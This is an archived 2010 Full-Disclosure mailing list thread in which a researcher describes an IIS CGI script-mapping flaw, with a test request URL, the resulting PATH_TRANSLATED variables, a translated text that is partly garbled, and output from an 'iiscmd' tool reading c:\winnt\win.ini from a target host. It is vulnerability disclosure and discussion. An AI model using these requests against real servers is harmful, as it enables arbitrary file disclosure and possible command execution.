lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 11 Dec 2010 14:10:02 +0000
From: yuange <yuange1975@...mail.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: iis4\iis5 cgi bug and WEB Service CGI
 Interface Vulnerability Analysis (continued)






 
Ms test that was given, but the developers do not think ms loopholes, really interesting, have to make to provide a successful test case. Do not bother them again, and developers say.


 The following test:
      1, the environment, the latest patch win2003 iis6;
      2, configure, make maps. Ida -> c: \ windows \ system32 \ idq.dll,. Php-> c: \ php \ php.exe
      3, test, first open the procexp to view the process environment variables, request: http://127.0.0.1/test.php/bb.ida
          W3wp.exe process quickly with procexp open a new process under the php.exe, view the environment variables:
          SCRIPT_NAME = / test.php
          PATH_INFO = / test.php / bb.idq
          PATH_TRANSLATED = c: \ inetpub \ wwwroot \ test.php \ bb.ida
     Indicating the request http://127.0.0.1/test.php/bb.ida, IIS6 identification is mapped. Php, cgi and variable PATH_TRANSLATED is the execution of the program script, PATH_TRANSLATED = c: \ inetpub \ wwwroot \ test.php \ bb. ida, that to carry out. ida file.
     "What that means is, that I can go to any implementation of an interpreter of a mapping file."
     The consequences of a simple script file contents can leak, severe control of the server can execute the command.
 
 

 曾经发给ms的测试说明,不过ms的开发人员认为不是漏洞,真有意思,非得让提供成功测试案例.懒得再和他们开发人员说了.
 
 
 如下测试:
      1、环境,最新补丁的win2003+iis6;
      2、配置,做映射 .ida  ->  c:\windows\system32\idq.dll, .php-> c:\php\php.exe
      3、测试,先打开procexp用于查看进程环境变量,请求:http://127.0.0.1/test.php/bb.ida
          迅速用procexp打开w3wp.exe进程下新进程php.exe,查看环境变量:
          SCRIPT_NAME=/test.php
          PATH_INFO=/test.php/bb.ida
          PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida
     说明请求http://127.0.0.1/test.php/bb.ida,IIS6识别是映射.php,而变量PATH_TRANSLATED是cgi程序执行的脚本, PATH_TRANSLATED=c:\inetpub\wwwroot\test.php\bb.ida,说明去执行了.ida文件。
     “那意思是什么呢,就是说我可以任意以一种解释程序去执行一种影射文件”。
     简单的后果是可以泄露脚本文件内容,严重的就可以执行命令控制服务器。
 

 
 


From: www417@...il.com
Date: Sat, 11 Dec 2010 18:48:09 +0800
Subject: Re: [Full-disclosure] iis4\iis5 cgi bug and WEB Service CGI Interface Vulnerability Analysis (continued)
To: yuange1975@...mail.com


yuange:
 
这篇文章的中文版以前就看过,但是当时没什么感觉。今天重读觉得有些启发。
 
如果没弄错,我想iiscmd程序应该是让php.exe去解释了c:\winnt\win.ini文件。
但是我想不出执行任意命令是怎么实现的。。。
 
应该不是缓冲区溢出那种暴力的方式,应该是一种比较巧妙的方法。
 

3w417

在 2010年12月11日 下午2:06,yuange <yuange1975@...mail.com>写道:


Too many bad things in the belly of the fast. 2000 of iis, unicode \ decode \ cgi \ webdav \ etc vulnerability, reaching a peak, and later transferred to rpc study. Now there is a 01 or so found a serious flaw, iis4, 5 set error load ing cgi vulnerability, execute arbitrary commands or view arbitrary files. Spent nearly a decade, this vulnerability have been quickly eaten away. Because iis5.1 core code into the kernel start iis, this exploit code has been dropped, so will not need a later version.
   There are loopholes in some time ago to write an article. Did not intend to put out, and feel that soon decayed, it released together.

  
http://hi.baidu.com/yuange1975/blog/item/6432bffa52252f0fa8d311ac.html
 
C:\tool>iiscmd -s 192.168.0.112 -f c:\winnt\win.ini
recv:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Dec 2010 05:21:17 GMT
Connection: close
X-Powered-By: PHP/4.0.0
Content-type: text/html

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
ivf=MPEGVideo
m3u=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpv2=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wvx=MPEGVideo

Server close!


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 		 	   		  
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ